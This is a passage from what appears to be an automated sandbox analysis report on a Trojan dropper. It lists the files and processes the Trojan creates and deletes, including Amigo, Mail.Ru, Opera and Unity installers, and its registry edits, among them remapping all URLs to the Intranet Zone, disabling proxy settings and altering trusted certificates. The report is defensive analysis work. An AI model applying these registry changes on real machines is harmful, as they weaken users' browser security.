%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mailruupdater.exe (38588 bytes)
%Documents and Settings%\%current user%\Desktop\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\en-US.pak (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\VisualElements\splash-620x300.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_watcher.dll (1636 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ms.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\da.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mg.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Интернет.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ca.pak (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\en-GB.pak (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\mr.pak (1801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\uk.pak (1689 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\hi.pak (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\de.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sr.pak (1670 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sk.pak (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\secondarytile.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\nacl_irt_x86_64.nexe (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\nb.pak (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome.dll (237340 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\unitywebplayer.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\vk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mailruupdater.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\ok.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\amigo.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\wow_helper.exe (0 bytes)

The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AmigoDistrib[1].exe (4395514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Opera_NI_stable[1].exe (87426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26.tmp.exe (1597932 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (5366 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Bundle[1].exe (28602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6.tmp.exe (29159 bytes)

The process MailRuUpdater.exe:3616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\GroupPolicy\User\Registry.pol (8 bytes)
%System%\GroupPolicy\gpt.ini (72 bytes)
%System%\GroupPolicy\Machine\Registry.pol (8 bytes)

The process MailRuUpdater.exe:3160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mail.Ru\MailRuUpdater\MailRuUpdater.exe (39945 bytes)
%Documents and Settings%\%current user%\Application Data\MailProducts\Id (38 bytes)
%Documents and Settings%\All Users\Application Data\Mail.Ru\Id (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (39945 bytes)

The process MailRuUpdater.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\GroupPolicy\gpt.ini (83 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\D91B91B51ECC4A219BCFF4912A8DCC16.html (0 bytes)

Registry activity

The process 6.tmp.exe:2524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 24 70 18 2D 8C CA C5 A1 7F 06 F5 56 FB AE 43"

The process 6.tmp.exe:2540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 66 3E A9 01 50 1A A9 67 3E 36 93 E9 20 DD 97"

[HKCU\Software\Opera Software]
"Last Stable Install Path" = "%Program Files%\Opera\"

The process 6.tmp.exe:2444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 9E AB 72 E0 77 03 CE 5F 51 47 7E 5E DC C9 D6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"SecureProtocols" = "168"

The process 6.tmp.exe:2488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 1B D4 58 6C B5 12 18 AE AF 03 41 DB 94 F4 0D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 6.tmp.exe:2496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 19 32 F1 60 04 ED A0 7D DC BF 5D E2 12 45 AC"

The process 6.tmp.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 23 C1 79 86 2F 8A F3 10 D3 D2 44 A5 FC 84 5A"

The process 26.tmp.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 04 22 2C 73 36 C2 82 8C DB 56 E0 9D 3E 5C 3D"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"RFR" = "789176"
"newrfr" = "789176"

The process UnityWebPlayer.exe:3196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer.1]
"(Default)" = "UnityWebPlayer Control"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"Version" = "5.0.3f2"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}]
"(Default)" = "UnityWebPlayer Control"

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer\CurVer]
"(Default)" = "UnityWebPlayer.UnityWebPlayer.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"DisplayName" = "Unity Web Player"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0\Suffixes]
"unity3d" = ""

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}]
"AppID" = "{F008CD3D-7044-4CD4-BE14-BF3FCCF144F9}"

[HKCU\Software\Classes\AppID\{F008CD3D-7044-4CD4-BE14-BF3FCCF144F9}]
"(Default)" = "UnityWebPlayer"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"DisplayVersion" = "5.0.3f2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Unity\WebPlayer]
"UnityWebPlayerDevelopment" = "no"

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer.1\CLSID]
"(Default)" = "{444785F1-DE89-4295-863A-D46C3A781394}"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx"

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer]
"(Default)" = "UnityWebPlayer Control"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\TypeLib]
"(Default)" = "{75A564FE-95D1-41a9-B1D9-10D1E3CB502B}"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\MiscStatus]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"Description" = "Unity Player 5.0.3f2"

[HKCU\Software\Unity\WebPlayer]
"un.Directory" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\MiscStatus\1]
"(Default)" = "131473"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"vendor" = "Unity Technologies ApS"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"NoRepair" = "1"
"HelpLink" = "http://unity3d.com/"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\TypeLib]
"(Default)" = "{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}]
"(Default)" = "_DUnityWebPlayerAX"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"ProductName" = "Unity Web Player"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0\MimeTypes\application/vnd.unity]
"Description" = "Unity Player datafile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{444785F1-DE89-4295-863A-D46C3A781394}]
"(Default)" = ""

[HKCU\Software\Classes\UnityWebPlayer.UnityWebPlayer\CLSID]
"(Default)" = "{444785F1-DE89-4295-863A-D46C3A781394}"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}]
"(Default)" = "_DUnityWebPlayerAXEvents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"QuietUninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe /S /CurrentUser"
"EstimatedSize" = "12288"

[HKCU\Software\Unity\WebPlayer]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0\MimeTypes\application/vnd.unity]
"Suffixes" = "unity3d"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader"

[HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Unity\WebPlayer]
"UnityWebPlayerReleaseChannel" = "Stable"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 48 97 7A 73 04 C9 24 82 1D FC F2 AF C1 C5 74"

[HKCU\Software\Classes\Interface\{6130BEAD-7375-4DB7-8B6D-7E41303CE675}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe /CurrentUser"
"NoModify" = "1"
"URLInfoAbout" = "http://unity3d.com/unitywebplayer.html"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\AppID\UnityWebPluginAX.ocx]
"AppID" = "{F008CD3D-7044-4CD4-BE14-BF3FCCF144F9}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\VersionIndependentProgID]
"(Default)" = "UnityWebPlayer.UnityWebPlayer"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\TypeLib]
"(Default)" = "{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}"

[HKCU\Software\Classes\TypeLib\{75A564FE-95D1-41A9-B1D9-10D1E3CB502B}\1.0]
"(Default)" = "UnityWebPlayerAXLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe"

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\ProgID]
"(Default)" = "UnityWebPlayer.UnityWebPlayer.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{444785F1-DE89-4295-863A-D46C3A781394}\iexplore\AllowedDomains\*]
"(Default)" = ""

[HKCU\Software\Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\ToolboxBitmap32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx, 102"

[HKCU\Software\Classes\Interface\{D10F4BFD-C3ED-44B7-BD0D-83F05E4D52D5}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UnityWebPlayer]
"Publisher" = "Unity Technologies ApS"

The process 1.tmp.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF BF 73 67 1F E3 30 CC 73 98 06 63 39 23 86 88"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup9338__14991.exe" = "amisetup9338__14991"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process 1.tmp.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 31 5C 76 12 9C 91 60 2C 57 D8 C8 72 92 A7 88"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup9364__14991.exe" = "amisetup9364__14991"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process opera.exe:2816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 06 44 49 F6 ED 57 5C 77 75 EB F5 05 FD 32 E5"

The process opera.exe:1432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 96 F6 4F C6 47 75 BE 1D F5 E0 4C 3B F3 D6 B6"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "opera.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\System\CurrentControlSet\Control\VIDEO\{459B62D6-C2AB-471C-BC12-EEF931FDF4EB}\0000]
"Attach.ToDesktop" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 6F 7E 74 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates]
"E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C"

The process opera.exe:2936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 25 4A E4 6E 67 6C D8 2D DD 5C FD F8 73 46 4F"

The process opera.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 B3 88 0C DC CD E3 95 42 42 09 55 3D 8D 3B 02"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

